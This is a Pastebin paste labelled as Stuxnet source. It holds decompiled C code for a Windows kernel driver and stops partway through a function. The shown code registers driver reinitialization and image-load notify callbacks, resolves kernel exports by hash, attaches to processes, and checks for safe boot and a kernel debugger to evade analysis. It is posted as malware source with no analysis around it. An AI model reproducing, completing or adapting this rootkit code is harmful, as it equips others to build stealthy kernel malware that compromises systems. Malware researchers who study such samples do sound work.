Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #include <windows.h>
- #include <defs.h>
- #Stuxnet Source #DarkSec
- //-------------------------------------------------------------------------
- // Data declarations
- extern const WCHAR aSystemrootSyst[]; // idb
- extern char dword_124C0[]; // idb
- extern char dword_124D0[]; // idb
- extern wchar_t aKernel32_dll[13]; // weak
- // extern PBOOLEAN KdDebuggerEnabled;
- // extern void *InitSafeBootMode; weak
- extern int dword_12628; // weak
- extern char byte_12630[]; // weak
- extern _BYTE byte_12644[20]; // idb
- extern int dword_12658; // weak
- extern char a_text[6]; // weak
- extern char aPage[5]; // weak
- extern char asc_12678[2]; // weak
- extern size_t dword_12680; // idb
- extern int dword_12684; // weak
- extern int dword_12688; // weak
- extern int dword_1268C; // weak
- extern int dword_12690; // weak
- extern _UNKNOWN unk_12694; // weak
- extern _UNKNOWN unk_12EB8; // weak
- extern _UNKNOWN unk_14380; // weak
- extern _UNKNOWN unk_14384; // weak
- extern char byte_14390; // weak
- extern int dword_14391; // weak
- extern const WCHAR word_14395; // idb
- extern const WCHAR word_1445D; // idb
- extern const WCHAR word_14471; // idb
- extern int dword_14539; // weak
- extern int dword_1453D; // weak
- extern const WCHAR SourceString; // idb
- extern char byte_14614; // weak
- extern char byte_14615; // weak
- extern char byte_14616; // weak
- extern char byte_14617; // weak
- extern int dword_1461C; // weak
- extern int dword_14620; // weak
- extern int dword_14624; // weak
- extern char byte_14628; // weak
- extern RTL_GENERIC_TABLE Table; // idb
- extern int dword_14654; // weak
- extern char byte_14658; // weak
- extern int dword_1465C; // weak
- extern int dword_14660; // weak
- extern char byte_14664; // weak
- extern int dword_14668; // weak
- extern struct _KMUTANT Mutex; // idb
- extern int dword_1468C; // weak
- extern int dword_14690; // weak
- extern int dword_14694; // weak
- extern int dword_14698; // weak
- extern int dword_1469C; // weak
- extern int dword_146A0; // weak
- extern int dword_146A4; // weak
- extern int dword_146A8; // weak
- extern int dword_146AC; // weak
- extern int dword_146B0; // weak
- //-------------------------------------------------------------------------
- // Function declarations
- #define __thiscall __cdecl // Test compile in C mode
- char __cdecl sub_10300();
- void __stdcall DriverReinitializationRoutine(PDRIVER_OBJECT DriverObject, int a2, unsigned int a3);
- NTSTATUS __stdcall DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath);
- int __stdcall sub_1048A(int a1);
- int __cdecl sub_10542();
- // int __usercall sub_1056C<eax>(int a1<esi>);
- // int __userpurge sub_105A0<eax>(int a1<ebx>, SIZE_T a2<edi>, int a3<esi>, const void *a4);
- // int __usercall sub_105E4<eax>(LSA_UNICODE_STRING *a1<ecx>, int a2<edi>, int a3<esi>);
- ULONG __thiscall sub_10638(LSA_UNICODE_STRING *this, ULONG a2, int a3);
- // void __userpurge sub_1076E(int a1<ebx>, PVOID *a2);
- signed int __fastcall sub_107A2(int a1, int a2);
- int *__cdecl sub_107E8();
- bool __stdcall sub_10886(int a1);
- int __stdcall sub_108BE(const char *a1);
- int __cdecl sub_1098E();
- // signed int __usercall sub_109B0<eax>(int a1<edi>);
- int __cdecl sub_10A3A();
- // int __usercall sub_10A8A<eax>(int a1<edi>, int *a2<esi>);
- // int __usercall sub_10AE2<eax>(int a1<esi>);
- // int __usercall sub_10B36<eax>(int a1<esi>);
- int __thiscall sub_10B68(int this);
- int __stdcall sub_10BA2(int, int); // weak
- signed int __cdecl sub_10BE8();
- // int __userpurge sub_10BEC<eax>(int a1<ebp>, int a2, int a3);
- // signed int __usercall sub_10C22<eax>(int a1<eax>);
- signed int __stdcall sub_10CFE(int a1, int a2);
- // void __usercall sub_10D7E(int a1<eax>);
- // int __usercall sub_10DA8<eax>(int a1<ecx>, int a2<edi>, int a3<esi>);
- void __stdcall sub_10DCC(int a1, HANDLE Handle, int a3);
- void __stdcall NotifyRoutine(int a1, HANDLE Handle, int a3);
- // int __userpurge sub_10FC4<eax>(int result<eax>, int a2);
- RTL_GENERIC_TABLE *__cdecl sub_10FE6();
- // PVOID __usercall sub_11028<eax>(int a1<eax>, RTL_GENERIC_TABLE *a2<edi>);
- // signed int __usercall sub_11066<eax>(int a1<eax>, RTL_GENERIC_TABLE *a2<edi>);
- // signed int __userpurge sub_110C0<eax>(RTL_GENERIC_TABLE *a1<eax>, int *a2);
- bool __stdcall CompareRoutine(int a1, int a2, int a3);
- PVOID __stdcall AllocateRoutine(int a1, SIZE_T NumberOfBytes);
- void __stdcall FreeRoutine(int a1, PVOID P);
- // int __usercall sub_1118A<eax>(int a1<ebx>, int a2<esi>);
- // int __userpurge sub_111B4<eax>(int a1<eax>, int a2<ebx>, int a3);
- // signed int __userpurge sub_11242<eax>(int a1<eax>, int a2, int a3);
- // PVOID __userpurge sub_113C2<eax>(int a1<edi>, int a2, int a3);
- // void __userpurge sub_1141E(int a1<eax>, int a2<ecx>, int a3<ebx>, int a4, int a5);
- void __fastcall sub_114EC(int a1, int a2, int a3, int a4, int a5);
- LONG_PTR __stdcall sub_11522(int a1, int a2, int a3, int a4, int a5);
- PVOID __stdcall sub_11578(int a1);
- PVOID __stdcall sub_11598(int a1);
- // signed int __userpurge sub_115CC<eax>(const void *a1<eax>, int a2<ebx>, int a3);
- signed int __thiscall sub_11718(int this, int a2, const void *a3);
- __int32 __stdcall sub_1174A(int a1, int a2);
- // char __usercall sub_117A8<al>(WCHAR *a1<eax>, int a2<ecx>);
- // PVOID __usercall sub_1182C<eax>(ULONG a1<esi>);
- // int __usercall sub_11864<eax>(HANDLE *a1<edi>);
- signed int __stdcall sub_118E2(unsigned int a1, int a2);
- char __fastcall sub_119AE(int a1, int a2);
- // char __usercall sub_11A08<al>(int a1<edi>);
- // int __userpurge sub_11A4A<eax>(int a1<eax>, int a2<ebx>, unsigned int a3);
- // const char *__usercall sub_11ABC<eax>(const char *result<eax>, int a2<ecx>);
- int __stdcall sub_11B04(int a1, const char *a2, unsigned int a3, int a4, int a5);
- int *__cdecl sub_11C14();
- int __stdcall sub_11CCC(int a1);
- char __stdcall sub_11D46(int a1, unsigned int a2);
- // NTSTATUS __userpurge sub_11D62<eax>(LSA_UNICODE_STRING *a1<eax>, PUNICODE_STRING ValueName, int a3);
- int __stdcall sub_11DD6(int, PUNICODE_STRING ValueName, int); // idb
- // int __usercall sub_11EC6<eax>(char a1<al>, int a2<ecx>, unsigned int a3<esi>);
- int __stdcall sub_11F42(int, int, HANDLE Handle); // idb
- // int __userpurge sub_11FC0<eax>(int a1<esi>, int a2, int a3);
- int __stdcall sub_12000(HANDLE Handle, PVOID ProcessInformation); // idb
- // int __userpurge sub_12094<eax>(int a1<ebx>, int a2<edi>, int a3);
- // LONG_PTR __usercall sub_120CC<eax>(PVOID Object<ecx>, LONG_PTR result<eax>);
- int __cdecl sub_120DE(int a1);
- int __cdecl sub_1210F(int a1, unsigned int a2);
- // signed int __usercall sub_1216B<eax>(int a1<eax>, unsigned int a2<ebx>);
- signed int __cdecl sub_121E1(int a1, int a2, int a3);
- signed int __cdecl sub_122B3(int a1, unsigned int a2);
- bool __cdecl sub_122D0(int a1, unsigned int a2, int a3, int a4);
- // signed int __usercall sub_12323<eax>(unsigned int a1<eax>, int a2, int a3, unsigned __int16 a4);
- signed int __cdecl sub_1236B(int a1, int a2);
- // NTSTATUS __stdcall ZwQuerySystemInformation(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength);
- // void *__cdecl memcpy(void *, const void *, size_t);
- // void *__cdecl memset(void *, int, size_t);
- // int _SEH_epilog(void); weak
- int nullsub_1(); // weak
- int nullsub_2(); // weak
- int sub_124FE(); // weak
- int nullsub_3(); // weak
- // KIRQL __fastcall KfAcquireSpinLock(PKSPIN_LOCK SpinLock);
- // KIRQL __stdcall KeGetCurrentIrql();
- // void __fastcall KfReleaseSpinLock(PKSPIN_LOCK SpinLock, KIRQL NewIrql);
- // NTSTATUS __stdcall ZwReadFile(HANDLE FileHandle, HANDLE Event, PIO_APC_ROUTINE ApcRoutine, PVOID ApcContext, PIO_STATUS_BLOCK IoStatusBlock, PVOID Buffer, ULONG Length, PLARGE_INTEGER ByteOffset, PULONG Key);
- // NTSTATUS __stdcall ZwClose(HANDLE Handle);
- // NTSTATUS __stdcall ZwOpenFile(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, ULONG ShareAccess, ULONG OpenOptions);
- // NTSTATUS __stdcall ZwQueryInformationFile(HANDLE FileHandle, PIO_STATUS_BLOCK IoStatusBlock, PVOID FileInformation, ULONG Length, FILE_INFORMATION_CLASS FileInformationClass);
- // BOOLEAN __stdcall PsGetVersion(PULONG MajorVersion, PULONG MinorVersion, PULONG BuildNumber, PUNICODE_STRING CSDVersion);
- // int __cdecl stricmp(const char *, const char *);
- // NTSTATUS __stdcall PsSetLoadImageNotifyRoutine(PLOAD_IMAGE_NOTIFY_ROUTINE NotifyRoutine);
- // PVOID __stdcall ExAllocatePool(POOL_TYPE PoolType, SIZE_T NumberOfBytes);
- // void __fastcall IofCompleteRequest(PIRP Irp, CCHAR PriorityBoost);
- // NTSTATUS __stdcall IoCreateDevice(PDRIVER_OBJECT DriverObject, ULONG DeviceExtensionSize, PUNICODE_STRING DeviceName, ULONG DeviceType, ULONG DeviceCharacteristics, BOOLEAN Exclusive, PDEVICE_OBJECT *DeviceObject);
- // BOOLEAN __stdcall RtlDeleteElementGenericTable(PRTL_GENERIC_TABLE Table, PVOID Buffer);
- // PKTHREAD __stdcall KeGetCurrentThread();
- // PVOID __stdcall RtlLookupElementGenericTable(PRTL_GENERIC_TABLE Table, PVOID Buffer);
- // void __stdcall RtlInitializeGenericTable(PRTL_GENERIC_TABLE Table, PRTL_GENERIC_COMPARE_ROUTINE CompareRoutine, PRTL_GENERIC_ALLOCATE_ROUTINE AllocateRoutine, PRTL_GENERIC_FREE_ROUTINE FreeRoutine, PVOID TableContext);
- // PVOID __stdcall RtlInsertElementGenericTable(PRTL_GENERIC_TABLE Table, PVOID Buffer, CLONG BufferSize, PBOOLEAN NewElement);
- // WCHAR __stdcall RtlUpcaseUnicodeChar(WCHAR SourceCharacter);
- // NTSTATUS __stdcall ZwAllocateVirtualMemory(HANDLE ProcessHandle, PVOID *BaseAddress, ULONG ZeroBits, PULONG AllocationSize, ULONG AllocationType, ULONG Protect);
- // void __stdcall RtlInitUnicodeString(PUNICODE_STRING DestinationString, PCWSTR SourceString);
- // void __stdcall IoRegisterDriverReinitialization(PDRIVER_OBJECT DriverObject, PDRIVER_REINITIALIZE DriverReinitializationRoutine, PVOID Context);
- // void __stdcall ExFreePoolWithTag(PVOID P, ULONG Tag);
- // void __stdcall KeInitializeMutex(PRKMUTEX Mutex, ULONG Level);
- // LONG __stdcall KeReleaseMutex(PRKMUTEX Mutex, BOOLEAN Wait);
- // NTSTATUS __stdcall KeWaitForSingleObject(PVOID Object, KWAIT_REASON WaitReason, KPROCESSOR_MODE WaitMode, BOOLEAN Alertable, PLARGE_INTEGER Timeout);
- // NTSTATUS __stdcall ZwQueryValueKey(HANDLE KeyHandle, PUNICODE_STRING ValueName, KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass, PVOID KeyValueInformation, ULONG Length, PULONG ResultLength);
- // NTSTATUS __stdcall ZwOpenKey(PHANDLE KeyHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes);
- // int __stdcall KeUnstackDetachProcess(_DWORD); weak
- // int __stdcall KeStackAttachProcess(_DWORD, _DWORD); weak
- // NTSTATUS __stdcall ZwQueryInformationProcess(HANDLE ProcessHandle, PROCESSINFOCLASS ProcessInformationClass, PVOID ProcessInformation, ULONG ProcessInformationLength, PULONG ReturnLength);
- // int __stdcall ObOpenObjectByPointer(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD); weak
- // int __stdcall PsLookupProcessByProcessId(_DWORD, _DWORD); weak
- // LONG_PTR __fastcall ObfDereferenceObject(PVOID Object);
- // signed int __usercall sub_12A24<eax>(int a1<esi>);
- signed int __cdecl sub_12A95(int a1);
- // bool __usercall sub_12D37<eax>(int a1<eax>, int a2);
- int __thiscall sub_12D71(void *this);
- // signed int __usercall sub_13343<eax>(int a1<eax>, unsigned int a2);
- // int __usercall sub_133BF<eax>(int a1<eax>, int a2, int a3);
- // int __usercall sub_13409<eax>(int a1<eax>, int a2, int a3, int a4);
- // int __usercall sub_1356E<eax>(unsigned int *a1<eax>, int a2<ebx>, int a3<edi>, int a4, int a5, int a6);
- int __thiscall sub_1369C(void *this);
- signed int __cdecl sub_136F8(int a1, int a2, int a3);
- signed int __cdecl sub_138BE(int a1, unsigned int a2);
- bool __cdecl sub_138DB(int a1, unsigned int a2, int a3, int a4);
- int __cdecl sub_1392E(int a1);
- // signed int __usercall sub_13A4B<eax>(unsigned int a1<eax>, int a2, int a3, unsigned __int16 a4);
- // signed int __usercall sub_13B3A<eax>(int a1<eax>, unsigned int a2<ebx>);
- // int __usercall sub_13BF1<eax>(unsigned int a1<eax>, int a2<ecx>, int a3, int a4, int a5);
- // signed int __usercall sub_13C66<eax>(int a1<eax>, int a2<edx>, int a3<ecx>, unsigned int a4);
- int __cdecl sub_13C92(int a1, char a2, int a3);
- // int __usercall sub_13CC0<eax>(int a1<eax>, int a2<edx>);
- // signed int __usercall sub_13D8E<eax>(int a1<eax>, int a2, int a3, unsigned int a4, int (__cdecl *a5)(_DWORD, _DWORD, _DWORD));
- //----- (00010300) --------------------------------------------------------
- char __cdecl sub_10300()
- {
- LSA_UNICODE_STRING DestinationString; // [sp+8h] [bp-18h]@1
- char v2; // [sp+10h] [bp-10h]@1
- HANDLE Handle; // [sp+14h] [bp-Ch]@2
- int v4; // [sp+18h] [bp-8h]@1
- char v5; // [sp+1Fh] [bp-1h]@1
- RtlInitUnicodeString(&DestinationString, L"\\SystemRoot\\System32\\hal.dll");
- v4 = 0;
- sub_105E4(&DestinationString, (int)&v4, (int)&v2);
- v5 = v4 == 0;
- if ( v2 )
- {
- v2 = 0;
- ZwClose(Handle);
- }
- return v5;
- }
- //----- (0001034C) --------------------------------------------------------
- void __stdcall DriverReinitializationRoutine(PDRIVER_OBJECT DriverObject, int a2, unsigned int a3)
- {
- if ( !KeGetCurrentIrql() )
- {
- if ( a3 <= 0x65 )
- {
- if ( !sub_10542() )
- {
- if ( sub_10300() )
- sub_10A3A();
- else
- IoRegisterDriverReinitialization(DriverObject, DriverReinitializationRoutine, 0);
- }
- }
- }
- }
- //----- (000103AA) --------------------------------------------------------
- NTSTATUS __stdcall DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)
- {
- signed int v2; // eax@2
- LSA_UNICODE_STRING DestinationString; // [sp+Ch] [bp-24h]@11
- unsigned int i; // [sp+14h] [bp-1Ch]@3
- CPPEH_RECORD ms_exc; // [sp+18h] [bp-18h]@1
- ms_exc.disabled = 0;
- dword_14624 = 128;
- dword_1461C = (int)ExAllocatePool(0, 0x200u);
- if ( dword_1461C )
- {
- byte_14628 = 1;
- for ( i = (unsigned int)&unk_14380; i < (unsigned int)&unk_14384; i += 4 )
- {
- if ( *(_DWORD *)i )
- (*(void (**)(void))i)();
- }
- v2 = 0;
- }
- else
- {
- v2 = -1073741823;
- }
- if ( !v2 )
- {
- if ( !sub_109B0((int)RegistryPath) )
- {
- RtlInitUnicodeString(&DestinationString, &SourceString);
- if ( !IoCreateDevice(DriverObject, 0, &DestinationString, 0x22u, 0x100u, 0, (PDEVICE_OBJECT *)&RegistryPath) )
- {
- DriverObject->MajorFunction[0] = (PDRIVER_DISPATCH)sub_10BA2;
- DriverObject->MajorFunction[2] = (PDRIVER_DISPATCH)sub_10BA2;
- DriverObject->MajorFunction[14] = (PDRIVER_DISPATCH)sub_10BA2;
- RegistryPath[3].Buffer = (PWSTR)((unsigned int)RegistryPath[3].Buffer & 0xFFFFFF7F);
- IoRegisterDriverReinitialization(DriverObject, (PDRIVER_REINITIALIZE)DriverReinitializationRoutine, 0);
- }
- }
- }
- return 0;
- }
- // 10BA2: using guessed type int __stdcall sub_10BA2(int, int);
- // 1461C: using guessed type int dword_1461C;
- // 14624: using guessed type int dword_14624;
- // 14628: using guessed type char byte_14628;
- //----- (0001048A) --------------------------------------------------------
- int __stdcall sub_1048A(int a1)
- {
- int v1; // edi@5
- int result; // eax@7
- int (*v3)(void); // edi@11
- int v4; // [sp+Ch] [bp-128h]@6
- __int16 v5; // [sp+120h] [bp-14h]@9
- int v6; // [sp+130h] [bp-4h]@3
- *(_BYTE *)a1 = 1;
- if ( !KeGetCurrentIrql() )
- {
- sub_1056C((int)&v6);
- if ( sub_10886(0) || sub_10886(1) )
- return 0;
- v1 = v6;
- if ( sub_10886(2) )
- {
- memset(&v4, 255, 0x11Cu);
- v4 = 284;
- if ( !*(_DWORD *)v1 )
- return -1073741823;
- result = (*(int (__stdcall **)(int *))v1)(&v4);
- if ( result )
- return result;
- if ( !v5 )
- return *(_DWORD *)(v1 + 4) != 0 ? 0xC0000001 : 0;
- }
- v3 = *(int (**)(void))(v1 + 4);
- if ( v3 )
- {
- if ( (unsigned __int8)v3() )
- *(_BYTE *)a1 = 0;
- return 0;
- }
- return -1073741823;
- }
- *(_BYTE *)a1 = 0;
- return 0;
- }
- //----- (00010542) --------------------------------------------------------
- int __cdecl sub_10542()
- {
- int result; // eax@1
- char v1; // [sp+7h] [bp-1h]@1
- v1 = 0;
- result = sub_1048A((int)&v1);
- if ( !result )
- result = (v1 != 0 ? 0x3FFFFFFF : 0) - 1073741823;
- return result;
- }
- //----- (0001056C) --------------------------------------------------------
- int __usercall sub_1056C<eax>(int a1<esi>)
- {
- int v1; // ecx@2
- *(_DWORD *)a1 = 0;
- if ( !(dword_146A4 & 1) )
- {
- dword_146A4 |= 1u;
- sub_107E8();
- sub_107A2(v1, (int)nullsub_1);
- }
- byte_14614 = 0;
- *(_DWORD *)a1 = &dword_14694;
- return a1;
- }
- // 124FA: using guessed type int nullsub_1();
- // 14614: using guessed type char byte_14614;
- // 14694: using guessed type int dword_14694;
- // 146A4: using guessed type int dword_146A4;
- //----- (000105A0) --------------------------------------------------------
- int __userpurge sub_105A0<eax>(int a1<ebx>, SIZE_T a2<edi>, int a3<esi>, const void *a4)
- {
- PVOID v4; // eax@1
- char v5; // zf@1
- v4 = ExAllocatePool(0, a2);
- v5 = *(_DWORD *)a1 == 0;
- *(_DWORD *)a3 = v4;
- *(_DWORD *)(a3 + 4) = a2;
- *(_DWORD *)(a3 + 8) = v4;
- *(_DWORD *)(a3 + 12) = a2;
- if ( v5 )
- {
- if ( *(_DWORD *)a3 )
- {
- if ( a4 )
- memcpy(*(void **)a3, a4, a2);
- }
- else
- {
- *(_DWORD *)a1 = -1073741823;
- }
- }
- return a3;
- }
- //----- (000105E4) --------------------------------------------------------
- int __usercall sub_105E4<eax>(LSA_UNICODE_STRING *a1<ecx>, int a2<edi>, int a3<esi>)
- {
- char v3; // zf@1
- NTSTATUS v4; // eax@2
- OBJECT_ATTRIBUTES ObjectAttributes; // [sp+8h] [bp-20h]@2
- struct _IO_STATUS_BLOCK IoStatusBlock; // [sp+20h] [bp-8h]@2
- v3 = *(_DWORD *)a2 == 0;
- *(_BYTE *)a3 = 0;
- *(_DWORD *)(a3 + 4) = 0;
- if ( v3 )
- {
- ObjectAttributes.ObjectName = a1;
- ObjectAttributes.Length = 24;
- ObjectAttributes.RootDirectory = 0;
- ObjectAttributes.Attributes = 576;
- ObjectAttributes.SecurityDescriptor = 0;
- ObjectAttributes.SecurityQualityOfService = 0;
- v4 = ZwOpenFile((PHANDLE)(a3 + 4), 0x80100000u, &ObjectAttributes, &IoStatusBlock, 1u, 0x60u);
- *(_DWORD *)a2 = v4;
- *(_BYTE *)a3 = v4 == 0;
- }
- return a3;
- }
- //----- (00010638) --------------------------------------------------------
- ULONG __thiscall sub_10638(LSA_UNICODE_STRING *this, ULONG a2, int a3)
- {
- char v3; // bl@1
- ULONG result; // eax@4
- HANDLE v5; // ecx@6
- ULONG v6; // edi@6
- ULONG v7; // esi@6
- NTSTATUS v8; // eax@7
- int v9; // eax@17
- int v10; // eax@18
- void **v11; // eax@21
- void *v12; // eax@22
- char FileInformation; // [sp+10h] [bp-28h]@7
- ULONG v14; // [sp+18h] [bp-20h]@7
- void *v15; // [sp+1Ch] [bp-1Ch]@7
- ULONG Length; // [sp+28h] [bp-10h]@1
- HANDLE Handle; // [sp+2Ch] [bp-Ch]@3
- struct _IO_STATUS_BLOCK IoStatusBlock; // [sp+30h] [bp-8h]@1
- v3 = 0;
- IoStatusBlock.Information = 0;
- sub_105E4(this, (int)&IoStatusBlock.Information, (int)&Length);
- if ( IoStatusBlock.Information )
- goto LABEL_2;
- if ( (_BYTE)Length )
- {
- v8 = ZwQueryInformationFile(Handle, &IoStatusBlock, &FileInformation, 0x18u, FileStandardInformation);
- v6 = v14;
- v5 = v15;
- v7 = v8;
- }
- else
- {
- v5 = Handle;
- v6 = Length;
- v7 = -1073741823;
- }
- IoStatusBlock.Information = v7;
- if ( v7 )
- goto LABEL_9;
- if ( v5 || v6 > a2 )
- goto LABEL_31;
- v9 = (int)ExAllocatePool(0, 0x10u);
- if ( v9 )
- v10 = sub_105A0((int)&IoStatusBlock.Information, v6, v9, 0);
- else
- v10 = 0;
- sub_1076E(a3, (PVOID *)v10);
- v3 = 0;
- if ( IoStatusBlock.Information )
- {
- LABEL_2:
- if ( (_BYTE)Length != v3 )
- {
- LOBYTE(Length) = v3;
- ZwClose(Handle);
- }
- return IoStatusBlock.Information;
- }
- v11 = *(void ***)(a3 + 4);
- if ( !v11 )
- goto LABEL_31;
- v12 = *v11;
- if ( !(_BYTE)Length )
- return -1073741823;
- v7 = ZwReadFile(Handle, 0, 0, 0, &IoStatusBlock, v12, v6, 0, 0);
- if ( v7 )
- {
- LABEL_9:
- if ( (_BYTE)Length != v3 )
- {
- LOBYTE(Length) = v3;
- ZwClose(Handle);
- }
- return v7;
- }
- if ( IoStatusBlock.Information != v6 )
- {
- LABEL_31:
- if ( (_BYTE)Length != v3 )
- {
- LOBYTE(Length) = v3;
- ZwClose(Handle);
- }
- result = -1073741823;
- }
- else
- {
- if ( (_BYTE)Length )
- {
- LOBYTE(Length) = 0;
- ZwClose(Handle);
- }
- result = 0;
- }
- return result;
- }
- //----- (0001076E) --------------------------------------------------------
- void __userpurge sub_1076E(int a1<ebx>, PVOID *a2)
- {
- PVOID *v2; // esi@1
- v2 = *(PVOID **)(a1 + 4);
- if ( a2 != v2 )
- {
- if ( v2 )
- {
- if ( *v2 )
- ExFreePoolWithTag(*v2, 0);
- ExFreePoolWithTag(v2, 0);
- }
- *(_DWORD *)(a1 + 4) = a2;
- }
- }
- //----- (000107A2) --------------------------------------------------------
- signed int __fastcall sub_107A2(int a1, int a2)
- {
- signed int result; // eax@5
- if ( !byte_14628 )
- goto LABEL_9;
- if ( !dword_1461C )
- goto LABEL_9;
- if ( dword_14624 <= dword_14620 )
- goto LABEL_9;
- _ECX = &dword_14620;
- _EAX = 1;
- __asm { lock xadd [ecx], eax }
- if ( dword_14624 > _EAX )
- {
- *(_DWORD *)(dword_1461C + 4 * _EAX) = a2;
- result = 0;
- }
- else
- {
- LABEL_9:
- result = 1;
- }
- return result;
- }
- // 1461C: using guessed type int dword_1461C;
- // 14620: using guessed type int dword_14620;
- // 14624: using guessed type int dword_14624;
- // 14628: using guessed type char byte_14628;
- //----- (000107E8) --------------------------------------------------------
- int *__cdecl sub_107E8()
- {
- int v0; // eax@2
- char v2; // [sp+4h] [bp-20h]@3
- dword_14694 = 0;
- dword_14698 = 0;
- dword_1469C = 0;
- dword_146A0 = 0;
- if ( !sub_10886(0) )
- {
- v0 = sub_1098E();
- if ( v0 )
- {
- if ( !sub_121E1((int)&v2, v0, 1) )
- {
- dword_14694 = sub_1236B((int)&v2, -899745608);
- dword_14698 = sub_1236B((int)&v2, -1332885072);
- dword_1469C = sub_1236B((int)&v2, -2007787012);
- dword_146A0 = sub_1236B((int)&v2, 1516803388);
- }
- }
- }
- return &dword_14694;
- }
- // 14694: using guessed type int dword_14694;
- // 14698: using guessed type int dword_14698;
- // 1469C: using guessed type int dword_1469C;
- // 146A0: using guessed type int dword_146A0;
- //----- (00010886) --------------------------------------------------------
- bool __stdcall sub_10886(int a1)
- {
- ULONG MinorVersion; // [sp+0h] [bp-8h]@1
- ULONG MajorVersion; // [sp+4h] [bp-4h]@1
- MajorVersion = 0;
- MinorVersion = 0;
- PsGetVersion(&MajorVersion, &MinorVersion, 0, 0);
- return MajorVersion == 5 && a1 == MinorVersion;
- }
- //----- (000108BE) --------------------------------------------------------
- int __stdcall sub_108BE(const char *a1)
- {
- ULONG v1; // edi@3
- PVOID v2; // esi@6
- int v4; // edi@17
- PVOID v5; // [sp-8h] [bp-3Ch]@5
- ULONG v6; // [sp-4h] [bp-38h]@5
- PVOID P; // [sp+10h] [bp-24h]@3
- int SystemInformation; // [sp+20h] [bp-14h]@1
- char *v9; // [sp+24h] [bp-10h]@3
- int v10; // [sp+28h] [bp-Ch]@13
- ULONG SystemInformationLength; // [sp+2Ch] [bp-8h]@1
- SystemInformationLength = 0;
- SystemInformation = 0;
- if ( ZwQuerySystemInformation(SystemModuleInformation, &SystemInformation, 0, &SystemInformationLength) != -1073741820
- || !SystemInformationLength )
- return 0;
- v9 = 0;
- sub_105A0((int)&v9, SystemInformationLength, (int)&P, 0);
- v1 = 0;
- if ( v9 )
- {
- if ( P )
- {
- v6 = 0;
- v5 = P;
- LABEL_9:
- ExFreePoolWithTag(v5, v6);
- }
- return 0;
- }
- v2 = P;
- if ( ZwQuerySystemInformation(SystemModuleInformation, P, SystemInformationLength, (PULONG)&SystemInformation) )
- {
- if ( !v2 )
- return 0;
- LABEL_8:
- v6 = v1;
- v5 = v2;
- goto LABEL_9;
- }
- if ( *(_DWORD *)v2 <= 0u )
- goto LABEL_8;
- v10 = 0;
- v9 = (char *)v2 + 30;
- while ( stricmp((const char *)v2 + v10 + *(_WORD *)v9 + 32, a1) )
- {
- v10 += 284;
- v9 += 284;
- ++v1;
- if ( v1 >= *(_DWORD *)v2 )
- {
- v1 = 0;
- goto LABEL_8;
- }
- }
- v4 = *((_DWORD *)v2 + 71 * v1 + 3);
- ExFreePoolWithTag(v2, 0);
- return v4;
- }
- //----- (0001098E) --------------------------------------------------------
- int __cdecl sub_1098E()
- {
- int result; // eax@1
- result = sub_108BE(dword_124C0);
- if ( !result )
- result = sub_108BE(dword_124D0);
- return result;
- }
- //----- (000109B0) --------------------------------------------------------
- signed int __usercall sub_109B0<eax>(int a1<edi>)
- {
- signed int result; // eax@8
- if ( byte_14390 )
- {
- sub_11EC6(0, (int)&dword_14391, 0x278u);
- byte_14390 = 0;
- }
- if ( !word_14395 )
- {
- if ( (unsigned int)*(_WORD *)a1 + 2 <= 0xC8 )
- {
- memset((void *)&word_14395, 0, 0xC8u);
- memcpy((void *)&word_14395, *(const void **)(a1 + 4), *(_WORD *)a1);
- }
- }
- if ( dword_14391 & 1 && InitSafeBootMode || dword_14391 & 2 && (_BYTE)KdDebuggerEnabled )
- result = -1073741823;
- else
- result = 0;
- return result;
- }
- // 125E4: using guessed type void *InitSafeBootMode;
- // 14390: using guessed type char byte_14390;
- // 14391: using guessed type int dword_14391;
- //----- (00010A3A) --------------------------------------------------------
- int __cdecl sub_10A3A()
- {
- int result; // eax@1
- char v1; // [sp+8h] [bp-8h]@1
- int v2; // [sp+Ch] [bp-4h]@1
- v2 = 0;
- sub_10A8A((int)&v1, &v2);
- result = v2;
- if ( !v2 )
- {
- sub_10AE2((int)&v2);
- result = sub_10C22(v2);
- if ( !result )
- {
- sub_10B36((int)&v1);
- sub_1056C((int)&v1);
- result = PsSetLoadImageNotifyRoutine((PLOAD_IMAGE_NOTIFY_ROUTINE)NotifyRoutine);
- }
- }
- return result;
- }
- //----- (00010A8A) --------------------------------------------------------
- int __usercall sub_10A8A<eax>(int a1<edi>, int *a2<esi>)
- {
- int v2; // eax@2
- int v3; // ecx@4
- *(_DWORD *)a1 = 0;
- if ( !(dword_146B0 & 1) )
- {
- v2 = *a2;
- dword_146B0 |= 1u;
- dword_146AC = v2;
- }
- if ( !(dword_146B0 & 2) )
- {
- dword_146B0 |= 2u;
- sub_11C14();
- sub_107A2(v3, (int)nullsub_3);
- }
- if ( dword_146AC )
- *a2 = dword_146AC;
- else
- *(_DWORD *)a1 = &dword_146A8;
- byte_14615 = 0;
- return a1;
- }
- // 12508: using guessed type int nullsub_3();
- // 14615: using guessed type char byte_14615;
- // 146A8: using guessed type int dword_146A8;
- // 146AC: using guessed type int dword_146AC;
- // 146B0: using guessed type int dword_146B0;
- //----- (00010AE2) --------------------------------------------------------
- int __usercall sub_10AE2<eax>(int a1<esi>)
- {
- int v1; // ecx@2
- *(_DWORD *)a1 = 0;
- if ( !(dword_14690 & 1) )
- {
- dword_14668 = 0;
- dword_14690 |= 1u;
- byte_14664 = 1;
- memset(&Mutex, 0, sizeof(Mutex));
- KeInitializeMutex(&Mutex, 0);
- sub_107A2(v1, (int)sub_124FE);
- }
- byte_14616 = 0;
- *(_DWORD *)a1 = &byte_14664;
- return a1;
- }
- // 124FE: using guessed type int sub_124FE();
- // 14616: using guessed type char byte_14616;
- // 14664: using guessed type char byte_14664;
- // 14668: using guessed type int dword_14668;
- // 14690: using guessed type int dword_14690;
- //----- (00010B36) --------------------------------------------------------
- int __usercall sub_10B36<eax>(int a1<esi>)
- {
- int v1; // ecx@2
- *(_DWORD *)a1 = 0;
- if ( !(dword_1468C & 1) )
- {
- dword_1468C |= 1u;
- sub_10FE6();
